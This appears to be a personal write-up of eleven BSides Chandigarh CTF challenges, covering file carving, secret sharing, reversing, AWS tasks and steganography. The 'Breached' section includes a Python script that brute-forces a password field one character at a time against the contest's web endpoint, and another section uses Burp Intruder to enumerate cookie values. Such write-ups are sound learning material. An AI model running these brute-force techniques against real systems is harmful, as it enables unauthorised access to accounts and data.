Bsides Chandigarh CTF
Bsides Chandigarh CTF
Challenge 1 : Sanity Check
Base64 encoded string was given, just had to decode it using base64 -d or online decoder
Challenge 2: Fix My Pdf
We first use wget to download a corrupted pdf and then use ghostscript to try and repair it
1
2
3
gs -o repaired.pdf -sDEVICE=pdfwrite -dPDFSETTINGS=/prepress corrupted.pdf
But it turns out in kali this file was yet available to read, since this was a rabbit hole i dug deeper.
I now used binwalk
to check for hidden files.
We can see there is a decrypt.txt, lets try and extract it.
Its showing an invalid header, so we can just change it to match the header using Hexedit.
We changed these bytes and now we are able to extract the file using pdftk
The decrypt.txt was a simple python script which gave us the flag on running it.
Challenge 3 : Crypto
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from math import prod
def lagrange_interpol(x, xs, ys):
sum = 0
for i in range(len(xs)):
numer = prod([(x - xs[j])/(xs[i] - xs[j]) for j in range(len(xs)) if i != j])
sum += ys[i] * numer
return sum
def recover_secret(shares):
x_coords, y_coords = zip(*shares)
secret_int = round(lagrange_interpol(0, x_coords, y_coords))
return secret_int
# Shares
shares = [(1, 567683), (2, 570399), (3, 115050)]
# Recover secret
secret = recover_secret(shares)
print(f"CRAC{/{/{secret}/}/}")
Basically shamir sharing secrets, we had to get an integer output in the crac{flag}. I used lagrange interpolation manually instead of using libraries because i was facing some errors.
Challenge 4: Fruit SLice
I opened the file in ghidra and upon analysis i came across these hardcoded hex values, i took these to cyber chef.
Then just Convert from hex to characters and then reverse it
Challenge 5: My Bank
Used dcode.fr and validated the the isbns
First, used a little bash-fu (cut and sed) to remove the -
and :
Then validated the lists. https://www.dcode.fr/isbn-book-code
Now made a python script to get my flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
char = '✘'
correct = []
with open('results.txt','r') as f:
for i in range(0,482):
data = f.readline()
if char in data:
continue
else:
correct.append(data.split('\t')[0])
indexes = []
with open('list_isbn.txt','r') as base:
for i in range(0,482):
data = base.readline()
# print(data)
if (data.strip() in correct) and ('1' in str(i)):
indexes.append(str(i))
flag = 'CRAC{' + ''.join(indexes) + '}'
print(flag)
list_isbn.txt is the list of cleaned isbns without the original indices and the original -
Challenge 6: Breached
This was a very fun challenge, i first just randomly clicked enter and also iterated through a - z using username parameter and came across the following:
Now we know that flag format is crac{
, so i used password filter to check for the same. And boom once again we get :
This time we only got this user which means the flag is there and we must bruteforce it, i made a python script to do so. For some reason ‘{’
was not appending properly in my script so i ran it till infinity till my password did not increment anymore and then manually added the final 2 ‘}}’
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
import string
# Base URL
url = 'http://web.ctf.defhawk.com:5000/search-db'
# Headers
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Referer': 'http://web.ctf.defhawk.com:5000/hogwartstechinc-breached-20231231',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://web.ctf.defhawk.com:5000',
'Connection': 'close'
}
# Initial password
password = "crac\{\{ho"
chars = ''.join([chr(i) for i in range(32, 127)])
# Iterate over alphanumeric characters
while True:
for char in string.ascii_letters + string.digits:
print("Testing for ",char)
payload = {'password': password + char}
print(payload)
response = requests.post(url, headers=headers, data=payload)
print(response.text)
if 'hogwarts' in response.text:
password += char
print(f"Password: {password}")
In the code above please remove the
\
before and after the parantheses in the linepassword=
i had to add them there because of double parantheses rendering issues.
At this point it started iteration again, and again which meant that we had found all the characters all that was left was to add the remaining ‘}}’
Password: crac{ {hohch0c73747d0e0e0wwissag} }
(Remove The Spaces, i added them to prevent jekyll from causing erros)
flag: CRAC{hohch0c73747d0e0e0wwissag}
Challenge 7: FlowLogs
This was quite easy just identify the ip from the logs based on the massive accepts and reject
CRAC{172.31.32.37}
Challenge 8: Followme
Based on the given text i was able to formulate a url
Then i realised i had to create a subscription to get an email or a text, so i used management console to do so
https://ap-south-1.console.aws.amazon.com/sns/v3/home?region=ap-south-1#/subscriptions
after this we just verify email and the flag would be emailed in a few minutes
Challenge 9: Loop
This challenge dealt with an API Gateway endpoint.
I first made the url https://h2vb2gupxd.execute-api.ap-south-1.amazonaws.com/prod/
Since i was getting forbidden i re read the question i read something about collectBits, i thought that was the endpoint, so i added that.
https://h2vb2gupxd.execute-api.ap-south-1.amazonaws.com/prod/collectBits/
{"errorMessage": "'cookie'", "errorType": "KeyError", "requestId": "d07a64c9-880d-4022-acc8-df712bbd0d0f", "stackTrace": [" File \"/var/task/lambda_function.py\", line 10, in lambda_handler\n cookie_header = event['headers']['cookie']\n"]}
This error message indicated that i needed a cookie with an integer value, i quickly spun up burp and checked for integer 0, it seemed as it i was gonna get the flag using integers in a row, so i used intruder to make my attack
After reading each individual response,
CRAC{H0w_Many_C@lls_Y0u_Can_M@ke}
Challenge 10: OneCallAway
Using ltrace i can see that the string was being compared to vhvdph
, so now i can use that as input
I got a string of decimal characters now trying to decode the following
It indicated a flag but i would have to rearrange these to get the fional flag, before that i decided to look at the binary in IDA and BOOM
print_phrase_decimal -> This function had the flag stored in it and i just had to type it in !
Challenge 11: LOUDER
Find the flag and when they ask, say “hocus pocus”.
This hint just gave away the whole thing because it meant that we had to extract a file using steghide and the password was hocus pocus